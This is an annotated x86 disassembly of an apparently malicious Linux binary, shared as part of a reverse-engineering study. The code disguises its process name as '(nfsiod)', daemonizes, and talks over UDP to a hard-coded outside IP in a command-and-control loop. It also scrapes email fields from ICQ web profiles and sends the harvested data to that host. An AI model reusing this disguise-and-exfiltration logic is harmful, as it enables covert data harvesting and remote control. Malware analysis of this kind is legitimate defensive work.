Annotated disassembly of foo

This is my annotated copy of 'tmp2', a file generated during the reverse engineering process. It is hyperlinked to what I believe to be the equivalent C code in appropriate places (namely the top of functions, and at function calls).

08048090: pop    %ecx
08048091: mov    %esp,%ebx
08048093: mov    %esp,%eax
08048095: mov    %ecx,%edx
08048097: add    %edx,%edx
08048099: add    %edx,%edx
0804809b: add    %edx,%eax
0804809d: add    $0x4,%eax
080480a0: xor    %ebp,%ebp
080480a2: push   %ebp
080480a3: push   %ebp
080480a4: push   %ebp
080480a5: mov    %esp,%ebp
080480a7: push   %eax
080480a8: push   %ebx
080480a9: push   %ecx
080480aa: mov    $0x88,%eax
080480af: mov    $0x0,%ebx
080480b4: int    $0x80
080480b6: mov    0x8(%esp,1),%eax
# Possible reference to data ''
080480ba: mov    %eax,0x807ad80
# Possible reference to data ''
080480bf: movzwl 0x807b2f0,%eax
080480c6: push   %eax
080480c7: call   0x08064818 <__setfpucw>
080480cc: add    $0x4,%esp
080480cf: call   0x08064040 <__libc_init>
080480d4: push   $0x8074a40
080480d9: call   0x0805599c <atexit>
080480de: add    $0x4,%esp
080480e1: call   0x08048080
080480e6: call   0x08048134 <main>
080480eb: push   %eax
080480ec: call   0x08055a50 <exit>
080480f1: pop    %ebx
080480f2: lea    0x0(%esi,1),%esi
080480f9: lea    0x0(%esi,1),%esi
08048100: mov    $0x1,%eax
08048105: int    $0x80
08048107: jmp    0x08048100
08048109: lea    0x0(%esi,1),%esi
08048110: push   %ebx
08048111: mov    $0x807ba84,%ebx
08048116: cmpl   $0x0,0x807ba84
0804811d: je     0x0804812c
0804811f: nop
08048120: mov    (%ebx),%eax
08048122: call   *%eax
08048124: add    $0x4,%ebx
08048127: cmpl   $0x0,(%ebx)
0804812a: jne    0x08048120
0804812c: pop    %ebx
0804812d: ret
0804812e: lea    (%esi),%esi
08048130: ret
08048131: nop
08048132: nop
08048133: nop

# 08048134 <main>:
08048134: push   %ebp
08048135: mov    %esp,%ebp
08048137: sub    $0x7534,%esp
0804813d: movl   $0x0,-0x4(%ebp)
08048144: push   $0x7530
08048149: push   $0x0
0804814b: lea    -0x7534(%ebp),%eax
08048151: push   %eax
08048152: call   0x08064a84 <memset>
08048157: add    $0xc,%esp
0804815a: mov    0xc(%ebp),%eax
0804815d: mov    (%eax),%edx
0804815f: push   %edx
08048160: call   0x08064e30 <strlen>
08048165: add    $0x4,%esp
08048168: mov    %eax,%eax
0804816a: push   %eax
0804816b: push   $0x0
0804816d: mov    0xc(%ebp),%eax
08048170: mov    (%eax),%edx
08048172: push   %edx
08048173: call   0x08064a84 <memset>
08048178: add    $0xc,%esp
# Possible reference to rodata '(nfsiod)'
0804817b: push   $0x8074a48
08048180: mov    0xc(%ebp),%eax
08048183: mov    (%eax),%edx
08048185: push   %edx
08048186: call   0x08063aa8 <strcpy>
0804818b: add    $0x8,%esp
0804818e: push   $0x1
08048190: push   $0x11
08048192: call   0x08063e5c <signal>
08048197: add    $0x8,%esp
0804819a: call   0x080644b8 <__libc_fork>
0804819f: mov    %eax,%eax
080481a1: test   %eax,%eax
080481a3: je     0x080481b0
080481a5: push   $0x0
080481a7: call   0x08055a50 <exit>
080481ac: add    $0x4,%esp
080481af: nop
080481b0: call   0x080645e8 <__libc_setsid>

080481b5: push   $0x1
080481b7: push   $0x11
080481b9: call   0x08063e5c <signal>
080481be: add    $0x8,%esp
080481c1: push   $0x1
080481c3: call   0x0806460c <__libc_setuid>
080481c8: add    $0x4,%esp
080481cb: push   $0x1
080481cd: call   0x08063e24 <seteuid>
080481d2: add    $0x4,%esp
080481d5: call   0x080644b8 <__libc_fork>
080481da: mov    %eax,%eax
080481dc: test   %eax,%eax
080481de: je     0x080481ec
080481e0: push   $0x0
080481e2: call   0x08055a50 <exit>
080481e7: add    $0x4,%esp
080481ea: lea    (%esi),%esi
080481ec: push   $0x1
080481ee: push   $0xd
080481f0: call   0x08063e5c <signal>
080481f5: add    $0x8,%esp
# Possible reference to rodata '/'
080481f8: push   $0x8074a51
080481fd: call   0x08064430 <__libc_chdir>
08048202: add    $0x4,%esp
08048205: push   $0x1
08048207: push   $0x11
08048209: call   0x08063e5c <signal>
0804820e: add    $0x8,%esp
08048211: jmp    0x08048218
08048213: nop
08048214: jmp    0x08048254
08048216: lea    (%esi),%esi
08048218: lea    -0x7534(%ebp),%eax
0804821e: push   %eax
0804821f: mov    -0x4(%ebp),%eax
08048222: push   %eax
08048223: call   0x0804841c <func6>
08048228: add    $0x8,%esp
0804822b: mov    %eax,%eax
0804822d: mov    %eax,-0x4(%ebp)
08048230: push   $0x7530
08048235: lea    -0x7534(%ebp),%eax
0804823b: push   %eax
0804823c: mov    -0x4(%ebp),%eax
0804823f: push   %eax
08048240: call   0x08048670 <func7>
08048245: add    $0xc,%esp
08048248: push   $0x1
0804824a: call   0x08055844 <sleep>
0804824f: add    $0x4,%esp
08048252: jmp    0x08048211
08048254: mov    %ebp,%esp
08048256: pop    %ebp
08048257: ret

# 08048258 <get_ip_num>:
08048258: push   %ebp
08048259: mov    %esp,%ebp
0804825b: sub    $0x8,%esp
0804825e: mov    0x8(%ebp),%eax
08048261: push   %eax
08048262: call   0x0804b4d8 <inet_addr>
08048267: add    $0x4,%esp
0804826a: mov    %eax,%eax
0804826c: mov    %eax,%edx
0804826e: mov    %edx,-0x4(%ebp)
08048271: cmp    $-0x1,%edx
08048274: jne    0x080482af
08048276: mov    0x8(%ebp),%eax
08048279: push   %eax
0804827a: call   0x0804a5cc <gethostbyname>
0804827f: add    $0x4,%esp
08048282: mov    %eax,%eax
08048284: mov    %eax,-0x8(%ebp)
08048287: cmpl   $0x0,-0x8(%ebp)
0804828b: jne    0x08048298
0804828d: push   $0x0
0804828f: call   0x08055a50 <exit>
08048294: add    $0x4,%esp
08048297: nop
08048298: push   $0x4
0804829a: lea    -0x4(%ebp),%eax
0804829d: push   %eax
0804829e: mov    -0x8(%ebp),%eax
080482a1: mov    0x10(%eax),%edx
080482a4: mov    (%edx),%eax
080482a6: push   %eax
080482a7: call   0x080638e8 <bcopy>
080482ac: add    $0xc,%esp
080482af: mov    -0x4(%ebp),%eax
080482b2: jmp    0x080482b4
080482b4: mov    %ebp,%esp
080482b6: pop    %ebp
080482b7: ret

# 080482b8 <open_udp>:
080482b8: push   %ebp
080482b9: mov    %esp,%ebp
080482bb: sub    $0x4,%esp
080482be: push   $0x11
080482c0: push   $0x2
080482c2: push   $0x2
080482c4: call   0x08063ff0 <socket>
080482c9: add    $0xc,%esp
080482cc: mov    %eax,%eax
080482ce: mov    %eax,-0x4(%ebp)
080482d1: cmpl   $0x0,-0x4(%ebp)
080482d5: jne    0x080482e4
080482d7: push   $0x0
080482d9: call   0x08055a50 <exit>
080482de: add    $0x4,%esp
080482e1: lea    0x0(%esi),%esi
080482e4: push   $0x800
080482e9: push   $0x4
080482eb: mov    -0x4(%ebp),%eax
080482ee: push   %eax
080482ef: call   0x08064488 <__libc_fcntl>
080482f4: add    $0xc,%esp
080482f7: mov    -0x4(%ebp),%eax
080482fa: jmp    0x080482fc
080482fc: mov    %ebp,%esp
080482fe: pop    %ebp
080482ff: ret


# 08048300 <close_socket>:
08048300: push   %ebp
08048301: mov    %esp,%ebp
08048303: mov    0x8(%ebp),%eax
08048306: push   %eax
08048307: call   0x0806445c <__libc_close>
0804830c: add    $0x4,%esp
0804830f: xor    %eax,%eax
08048311: jmp    0x08048314
08048313: nop
08048314: mov    %ebp,%esp
08048316: pop    %ebp
08048317: ret


# 08048318 <send_msg_home>:
08048318: push   %ebp
08048319: mov    %esp,%ebp
0804831b: sub    $0x10,%esp
0804831e: cmpl   $0x0,0x8(%ebp)
08048322: je     0x0804837c
08048324: push   $0x10
08048326: lea    -0x10(%ebp),%eax
08048329: push   %eax
0804832a: call   0x08064894 <bzero>
0804832f: add    $0x8,%esp
# Possible reference to rodata '216.242.103.2'
08048332: push   $0x8074a53
08048337: call   0x08048258 <get_ip_num>
0804833c: add    $0x4,%esp
0804833f: mov    %eax,%eax
08048341: mov    %eax,-0xc(%ebp)
08048344: movw   $0x2,-0x10(%ebp)
0804834a: movw   $0xa5d0,-0xe(%ebp)
08048350: push   $0x10
08048352: lea    -0x10(%ebp),%eax
08048355: push   %eax
08048356: push   $0x0
08048358: mov    0x10(%ebp),%eax
0804835b: push   %eax
0804835c: mov    0xc(%ebp),%eax
0804835f: push   %eax
08048360: mov    0x8(%ebp),%eax
08048363: push   %eax
08048364: call   0x08063f90 <sendto>
08048369: add    $0x18,%esp
0804836c: mov    %eax,%eax
0804836e: test   %eax,%eax
08048370: jge    0x0804837c
08048372: push   $0x0
08048374: call   0x08055a50 <exit>
08048379: add    $0x4,%esp
0804837c: xor    %eax,%eax
0804837e: jmp    0x08048380
08048380: mov    %ebp,%esp
08048382: pop    %ebp
08048383: ret

# 08048384 <recv_msg_from_home>:
08048384: push   %ebp
08048385: mov    %esp,%ebp
08048387: sub    $0x18,%esp
0804838a: movl   $0x10,-0x14(%ebp)
08048391: movl   $0x0,-0x18(%ebp)
08048398: mov    0x10(%ebp),%eax
0804839b: push   %eax
0804839c: mov    0xc(%ebp),%eax
0804839f: push   %eax
080483a0: call   0x08064894 <bzero>
080483a5: add    $0x8,%esp
080483a8: cmpl   $0x0,0x8(%ebp)
080483ac: je     0x08048414
080483ae: push   $0x10
080483b0: lea    -0x10(%ebp),%eax
080483b3: push   %eax
080483b4: call   0x08064894 <bzero>
080483b9: add    $0x8,%esp
# Possible reference to rodata '216.242.103.2'
080483bc: push   $0x8074a53
080483c1: call   0x08048258 <get_ip_num>
080483c6: add    $0x4,%esp
080483c9: mov    %eax,%eax
080483cb: mov    %eax,-0xc(%ebp)
080483ce: movw   $0x2,-0x10(%ebp)
080483d4: movw   $0xa5d0,-0xe(%ebp)
080483da: lea    -0x14(%ebp),%eax
080483dd: push   %eax
080483de: lea    -0x10(%ebp),%eax
080483e1: push   %eax
080483e2: push   $0x0
080483e4: mov    0x10(%ebp),%eax
080483e7: push   %eax
080483e8: mov    0xc(%ebp),%eax
080483eb: push   %eax
080483ec: mov    0x8(%ebp),%eax
080483ef: push   %eax
080483f0: call   0x08063ee4 <recvfrom>
080483f5: add    $0x18,%esp
080483f8: mov    %eax,%eax
080483fa: mov    %eax,-0x18(%ebp)
080483fd: cmpl   $0x0,-0x18(%ebp)
08048401: jge    0x0804840c
08048403: xor    %eax,%eax
08048405: jmp    0x08048418
08048407: nop
08048408: jmp    0x08048414
0804840a: lea    (%esi),%esi
0804840c: mov    $0x1,%eax
08048411: jmp    0x08048418
08048413: nop
08048414: xor    %eax,%eax
08048416: jmp    0x08048418
08048418: mov    %ebp,%esp
0804841a: pop    %ebp
0804841b: ret

# 0804841c <func6>:
0804841c: push   %ebp
0804841d: mov    %esp,%ebp
0804841f: sub    $0x40c,%esp
08048425: movl   $0x1,-0xc(%ebp)
# Possible reference to data ''
0804842c: mov    0x807ad84,%eax
08048431: add    $0x62,%eax
08048434: cmp    %eax,0x8(%ebp)
08048437: ja     0x08048448
# Possible reference to data ''
08048439: cmpl   $0x0,0x807ad84
08048440: jne    0x08048664
08048446: jmp    0x08048448
08048448: call   0x080482b8 <open_udp>
0804844d: mov    %eax,%eax
0804844f: mov    %eax,-0x4(%ebp)
08048452: mov    0xc(%ebp),%eax
08048455: push   %eax
08048456: call   0x08064e30 <strlen>
0804845b: add    $0x4,%esp
0804845e: mov    %eax,%eax
08048460: cmp    $0x3,%eax
08048463: jbe    0x08048518
08048469: cmpl   $0x0,-0xc(%ebp)
0804846d: jne    0x08048474
0804846f: jmp    0x08048518
08048474: movl   $0x0,-0x8(%ebp)
0804847b: mov    0xc(%ebp),%eax
# Possible reference to data in bss
0804847e: add    0x8080f38,%eax
08048484: movb   $0x0,(%eax)
# Possible reference to data in bss
08048487: incl   0x8080f38
# Possible reference to data in bss
0804848d: mov    0x8080f38,%eax
08048492: push   %eax
08048493: mov    0xc(%ebp),%eax
08048496: push   %eax
08048497: mov    -0x4(%ebp),%eax
0804849a: push   %eax
0804849b: call   0x08048318 <send_msg_home>
080484a0: add    $0xc,%esp
080484a3: push   $0xa
080484a5: call   0x08055844 <sleep>
080484aa: add    $0x4,%esp
080484ad: incl   -0x8(%ebp)
080484b0: push   $0x3e8
080484b5: lea    -0x40c(%ebp),%eax
080484bb: push   %eax
080484bc: mov    -0x4(%ebp),%eax
080484bf: push   %eax
080484c0: call   0x08048384 <recv_msg_from_home>
080484c5: add    $0xc,%esp
080484c8: mov    %eax,%eax
080484ca: test   %eax,%eax
080484cc: jg     0x080484d8
080484ce: cmpl   $0xa,-0x8(%ebp)
080484d2: jle    0x080484dc
080484d4: jmp    0x080484d8
080484d6: lea    (%esi),%esi
080484d8: jmp    0x080484e0
080484da: lea    (%esi),%esi
080484dc: jmp    0x0804848d
080484de: lea    (%esi),%esi
080484e0: cmpl   $0xa,-0x8(%ebp)
080484e4: jle    0x080484f0
080484e6: push   $0x0
080484e8: call   0x08055a50 <exit>
080484ed: add    $0x4,%esp
080484f0: push   $0x3

# Possible reference to rodata 'GOT'
080484f2: push   $0x8074a61
080484f7: lea    -0x40c(%ebp),%eax
080484fd: push   %eax
080484fe: call   0x08064ef8 <strncmp>
08048503: add    $0xc,%esp
08048506: mov    %eax,%eax
08048508: test   %eax,%eax
0804850a: jne    0x08048513
0804850c: movl   $0x0,-0xc(%ebp)
08048513: jmp    0x08048469
08048518: nop
08048519: jmp    0x08048524
0804851b: nop
0804851c: jmp    0x0804865c
08048521: lea    0x0(%esi),%esi
08048524: movl   $0x0,-0x8(%ebp)
0804852b: push   $0x3
# Possible reference to rodata 'GU\n'
0804852d: push   $0x8074a65
08048532: mov    -0x4(%ebp),%eax
08048535: push   %eax
08048536: call   0x08048318 <send_msg_home>
0804853b: add    $0xc,%esp
0804853e: push   $0xa
08048540: call   0x08055844 <sleep>
08048545: add    $0x4,%esp
08048548: incl   -0x8(%ebp)
0804854b: push   $0x3e8
08048550: lea    -0x40c(%ebp),%eax
08048556: push   %eax
08048557: mov    -0x4(%ebp),%eax
0804855a: push   %eax
0804855b: call   0x08048384 <recv_msg_from_home>
08048560: add    $0xc,%esp
08048563: mov    %eax,%eax
08048565: test   %eax,%eax
08048567: jg     0x08048574
08048569: cmpl   $0xa,-0x8(%ebp)
0804856d: jle    0x08048578
0804856f: jmp    0x08048574
08048571: lea    0x0(%esi),%esi
08048574: jmp    0x0804857c
08048576: lea    (%esi),%esi
08048578: jmp    0x0804852b
0804857a: lea    (%esi),%esi
0804857c: cmpl   $0xa,-0x8(%ebp)
08048580: jle    0x08048598
08048582: mov    -0x4(%ebp),%eax
08048585: push   %eax
08048586: call   0x08048300 <close_socket>
0804858b: add    $0x4,%esp
0804858e: push   $0x0
08048590: call   0x08055a50 <exit>
08048595: add    $0x4,%esp
08048598: push   $0x3
# Possible reference to rodata 'DIE'
0804859a: push   $0x8074a69
0804859f: lea    -0x40c(%ebp),%eax
080485a5: push   %eax
080485a6: call   0x08064ef8 <strncmp>
080485ab: add    $0xc,%esp
080485ae: mov    %eax,%eax
080485b0: test   %eax,%eax
080485b2: jne    0x080485cc
080485b4: mov    -0x4(%ebp),%eax
080485b7: push   %eax
080485b8: call   0x08048300 <close_socket>
080485bd: add    $0x4,%esp
080485c0: push   $0x0
080485c2: call   0x08055a50 <exit>
080485c7: add    $0x4,%esp
080485ca: lea    (%esi),%esi
080485cc: push   $0x2
# Possible reference to rodata 'DU'
080485ce: push   $0x8074a6d
080485d3: lea    -0x40c(%ebp),%eax
080485d9: push   %eax
080485da: call   0x08064ef8 <strncmp>
080485df: add    $0xc,%esp
080485e2: mov    %eax,%eax
080485e4: test   %eax,%eax
080485e6: jne    0x08048654
# Possible reference to data ''
080485e8: push   $0x807ad84
# Possible reference to rodata '%lu'
080485ed: push   $0x8074a70
080485f2: lea    -0x40c(%ebp),%eax
080485f8: lea    0x2(%eax),%edx
080485fb: push   %edx
080485fc: call   0x0804de0c <_IO_sscanf>
08048601: add    $0xc,%esp
08048604: push   $0x7530
08048609: push   $0x0
0804860b: mov    0xc(%ebp),%eax
0804860e: push   %eax
0804860f: call   0x08064a84 <memset>
08048614: add    $0xc,%esp
# Possible reference to data ''
08048617: mov    0x807ad84,%eax
# Possible reference to rodata 'SE%lu\n'
0804861c: push   %eax
0804861d: push   $0x8074a74
08048622: mov    0xc(%ebp),%eax
08048625: push   %eax
08048626: call   0x0804ddf4 <_IO_sprintf>
0804862b: add    $0xc,%esp
0804862e: mov    0xc(%ebp),%eax
08048631: push   %eax
08048632: call   0x08064e30 <strlen>
08048637: add    $0x4,%esp
# Possible reference to data in bss
0804863a: mov    %eax,0x8080f38
0804863f: mov    -0x4(%ebp),%eax
08048642: push   %eax
08048643: call   0x08048300 <close_socket>
08048648: add    $0x4,%esp
# Possible reference to data ''
0804864b: mov    0x807ad84,%eax
08048650: jmp    0x0804866c
08048652: lea    (%esi),%esi
08048654: jmp    0x08048519
08048659: lea    0x0(%esi),%esi
0804865c: xor    %eax,%eax
0804865e: jmp    0x0804866c
08048660: jmp    0x0804866c
08048662: lea    (%esi),%esi
08048664: mov    0x8(%ebp),%edx
08048667: inc    %edx
08048668: mov    %edx,%eax
0804866a: jmp    0x0804866c
0804866c: mov    %ebp,%esp
0804866e: pop    %ebp
0804866f: ret

# 08048670 <func7>:
08048670: push   %ebp
08048671: mov    %esp,%ebp
08048673: sub    $0x428,%esp
08048679: movl   $0x1,-0x18(%ebp)
08048680: movl   $0x0,-0x20(%ebp)
08048687: movb   $0x20,-0x422(%ebp)
0804868e: movl   $0x0,-0x428(%ebp)
# Possible reference to rodata 'web.icq.com'
08048698: push   $0x8074a7b
0804869d: call   0x08048258 <get_ip_num>
080486a2: add    $0x4,%esp
080486a5: mov    %eax,%eax
080486a7: mov    %eax,-0xc(%ebp)
080486aa: movw   $0x2,-0x10(%ebp)
080486b0: push   $0x50
080486b2: call   0x08064880 <__htons>
080486b7: add    $0x4,%esp
080486ba: mov    %eax,%eax
080486bc: mov    %ax,-0xe(%ebp)
080486c0: push   $0x6
080486c2: push   $0x1
080486c4: push   $0x2
080486c6: call   0x08063ff0 <socket>
080486cb: add    $0xc,%esp
080486ce: mov    %eax,%eax
080486d0: mov    %eax,-0x14(%ebp)
080486d3: push   $0x10
080486d5: lea    -0x10(%ebp),%eax
080486d8: push   %eax
080486d9: mov    -0x14(%ebp),%eax
080486dc: push   %eax
080486dd: call   0x08063e9c <connect>
080486e2: add    $0xc,%esp
080486e5: mov    %eax,%eax
080486e7: cmp    $-0x1,%eax
080486ea: jne    0x08048700
080486ec: mov    -0x14(%ebp),%eax
080486ef: push   %eax
080486f0: call   0x0806445c <__libc_close>
080486f5: add    $0x4,%esp
080486f8: xor    %eax,%eax
080486fa: jmp    0x080489a4
080486ff: nop
08048700: push   $0x1
08048702: call   0x08055844 <sleep>
08048707: add    $0x4,%esp
0804870a: push   $0x800
0804870f: push   $0x4
08048711: mov    -0x14(%ebp),%eax
08048714: push   %eax
08048715: call   0x08064488 <__libc_fcntl>
0804871a: add    $0xc,%esp
0804871d: mov    0x8(%ebp),%eax
08048720: push   %eax
# Possible reference to rodata 
# 'GET /wwp?Uin=%lu HTTP/1.0\nHost: web.icq.com\n\n'
08048721: push   $0x8074a87
08048726: lea    -0x420(%ebp),%eax
0804872c: push   %eax
0804872d: call   0x0804ddf4 <_IO_sprintf>
08048732: add    $0xc,%esp
08048735: push   $0x0
08048737: lea    -0x420(%ebp),%eax
0804873d: push   %eax
0804873e: call   0x08064e30 <strlen>
08048743: add    $0x4,%esp
08048746: mov    %eax,%eax
08048748: push   %eax
08048749: lea    -0x420(%ebp),%eax
0804874f: push   %eax
08048750: mov    -0x14(%ebp),%eax
08048753: push   %eax
08048754: call   0x08063f44 <send>
08048759: add    $0x10,%esp
0804875c: push   $0x0
0804875e: call   0x080646f0 <__libc_time>
08048763: add    $0x4,%esp
08048766: mov    %eax,-0x428(%ebp)
0804876c: cmpl   $0x0,-0x18(%ebp)
08048770: jne    0x08048778
08048772: jmp    0x08048994
08048777: nop
08048778: push   $0x0
0804877a: call   0x080646f0 <__libc_time>
0804877f: add    $0x4,%esp
08048782: mov    %eax,%eax
08048784: mov    %eax,%edx
08048786: sub    -0x428(%ebp),%edx
0804878c: cmp    $0x19,%edx
0804878f: jbe    0x08048798
08048791: movl   $0x0,-0x18(%ebp)
08048798: mov    -0x14(%ebp),%eax
0804879b: push   %eax
0804879c: call   0x080489a8 <func8>
080487a1: add    $0x4,%esp
080487a4: mov    %eax,%eax
080487a6: test   %eax,%eax
080487a8: je     0x0804898e
080487ae: push   $0x1
080487b0: lea    -0x421(%ebp),%eax
080487b6: push   %eax
080487b7: mov    -0x14(%ebp),%eax
080487ba: push   %eax
080487bb: call   0x0806458c <__libc_read>
080487c0: add    $0xc,%esp
080487c3: mov    %eax,%eax
080487c5: mov    %eax,-0x1c(%ebp)
080487c8: cmpl   $0x1,-0x1c(%ebp)
080487cc: jne    0x080487ec
080487ce: cmpl   $0x0,-0x20(%ebp)
080487d2: jne    0x080487ec
080487d4: cmpb   $0x22,-0x421(%ebp)
080487db: jne    0x080487e4
080487dd: movl   $0x1,-0x20(%ebp)
080487e4: jmp    0x0804897c
080487e9: lea    0x0(%esi),%esi
080487ec: cmpl   $0x1,-0x1c(%ebp)
080487f0: jne    0x080488f0
080487f6: cmpl   $0x1,-0x20(%ebp)
080487fa: jne    0x080488f0
08048800: movzbl -0x422(%ebp),%eax
08048807: cmp    $0x6c,%eax
0804880a: je     0x080488ac
08048810: cmp    $0x6c,%eax
08048813: jg     0x08048838
08048815: cmp    $0x61,%eax
08048818: je     0x08048884
0804881a: cmp    $0x61,%eax
0804881d: jg     0x0804882c
0804881f: cmp    $0x22,%eax
08048822: je     0x0804885c
08048824: jmp    0x080488e8
08048829: lea    0x0(%esi),%esi
0804882c: cmp    $0x69,%eax
0804882f: je     0x08048898
08048831: jmp    0x080488e8
08048836: lea    (%esi),%esi
08048838: cmp    $0x6f,%eax
0804883b: je     0x080488d4
08048841: cmp    $0x6f,%eax
08048844: jg     0x08048850
08048846: cmp    $0x6d,%eax
08048849: je     0x08048870
0804884b: jmp    0x080488e8
08048850: cmp    $0x74,%eax
08048853: je     0x080488c0
08048855: jmp    0x080488e8
0804885a: lea    (%esi),%esi
0804885c: cmpb   $0x6d,-0x421(%ebp)
08048863: je     0x0804886c
08048865: movl   $0x0,-0x20(%ebp)
0804886c: jmp    0x080488e8
0804886e: lea    (%esi),%esi
08048870: cmpb   $0x61,-0x421(%ebp)
08048877: je     0x08048880
08048879: movl   $0x0,-0x20(%ebp)
08048880: jmp    0x080488e8
08048882: lea    (%esi),%esi
08048884: cmpb   $0x69,-0x421(%ebp)
0804888b: je     0x08048894
0804888d: movl   $0x0,-0x20(%ebp)
08048894: jmp    0x080488e8
08048896: lea    (%esi),%esi
08048898: cmpb   $0x6c,-0x421(%ebp)
0804889f: je     0x080488a8
080488a1: movl   $0x0,-0x20(%ebp)
080488a8: jmp    0x080488e8
080488aa: lea    (%esi),%esi
080488ac: cmpb   $0x74,-0x421(%ebp)
080488b3: je     0x080488bc
080488b5: movl   $0x0,-0x20(%ebp)
080488bc: jmp    0x080488e8
080488be: lea    (%esi),%esi
080488c0: cmpb   $0x6f,-0x421(%ebp)
080488c7: je     0x080488d0
080488c9: movl   $0x0,-0x20(%ebp)
080488d0: jmp    0x080488e8
080488d2: lea    (%esi),%esi
080488d4: cmpb   $0x3a,-0x421(%ebp)
080488db: jne    0x080488e4
080488dd: movl   $0x2,-0x20(%ebp)
080488e4: jmp    0x080488e8
080488e6: lea    (%esi),%esi
080488e8: jmp    0x0804897c
080488ed: lea    0x0(%esi),%esi
080488f0: cmpl   $0x1,-0x1c(%ebp)
080488f4: jne    0x0804897c
080488fa: cmpl   $0x2,-0x20(%ebp)
080488fe: jne    0x0804897c
08048900: cmpb   $0x22,-0x421(%ebp)
08048907: je     0x08048944
08048909: mov    0x10(%ebp),%eax
0804890c: dec    %eax
# Possible reference to data in bss
0804890d: cmp    %eax,0x8080f38
08048913: jge    0x08048944
08048915: movzbl -0x421(%ebp),%eax
0804891c: push   %eax
0804891d: call   0x08048a90 <isprint>
08048922: add    $0x4,%esp
08048925: mov    %eax,%eax
08048927: test   %eax,%eax
08048929: je     0x08048942
0804892b: mov    0xc(%ebp),%eax
# Possible reference to data in bss
0804892e: add    0x8080f38,%eax
08048934: mov    -0x421(%ebp),%dl
0804893a: mov    %dl,(%eax)
# Possible reference to data in bss
0804893c: incl   0x8080f38
08048942: jmp    0x0804897c
08048944: mov    0x10(%ebp),%eax
08048947: dec    %eax
# Possible reference to data in bss
08048948: cmp    %eax,0x8080f38
0804894e: jge    0x08048962
08048950: mov    0xc(%ebp),%eax
# Possible reference to data in bss
08048953: add    0x8080f38,%eax
08048959: movb   $0xa,(%eax)
# Possible reference to data in bss
0804895c: incl   0x8080f38
08048962: mov    -0x14(%ebp),%eax
08048965: push   %eax
08048966: call   0x0806445c <__libc_close>
0804896b: add    $0x4,%esp
0804896e: push   $0x1
08048970: call   0x08055844 <sleep>
08048975: add    $0x4,%esp
08048978: xor    %eax,%eax
0804897a: jmp    0x080489a4
0804897c: cmpl   $0x1,-0x1c(%ebp)
08048980: jne    0x0804898e
08048982: mov    -0x421(%ebp),%al
08048988: mov    %al,-0x422(%ebp)
0804898e: jmp    0x0804876c
08048993: nop
08048994: mov    -0x14(%ebp),%eax
08048997: push   %eax
08048998: call   0x0806445c <__libc_close>
0804899d: add    $0x4,%esp
080489a0: xor    %eax,%eax
080489a2: jmp    0x080489a4
080489a4: mov    %ebp,%esp
080489a6: pop    %ebp
080489a7: ret


# 080489a8 <func8>:
080489a8: push   %ebp
080489a9: mov    %esp,%ebp
080489ab: sub    $0x4,%esp
080489ae: lea    -0x4(%ebp),%eax
080489b1: push   %eax
080489b2: push   $0x541b
080489b7: mov    0x8(%ebp),%eax
080489ba: push   %eax
080489bb: call   0x0806452c <__libc_ioctl>
080489c0: add    $0xc,%esp
080489c3: mov    %eax,%eax
080489c5: cmp    $-0x1,%eax
080489c8: jne    0x080489d4
080489ca: mov    $-0x1,%eax
080489cf: jmp    0x080489dc
080489d1: lea    0x0(%esi),%esi
080489d4: mov    -0x4(%ebp),%eax
080489d7: jmp    0x080489dc
080489d9: lea    0x0(%esi),%esi
080489dc: mov    %ebp,%esp
080489de: pop    %ebp
080489df: ret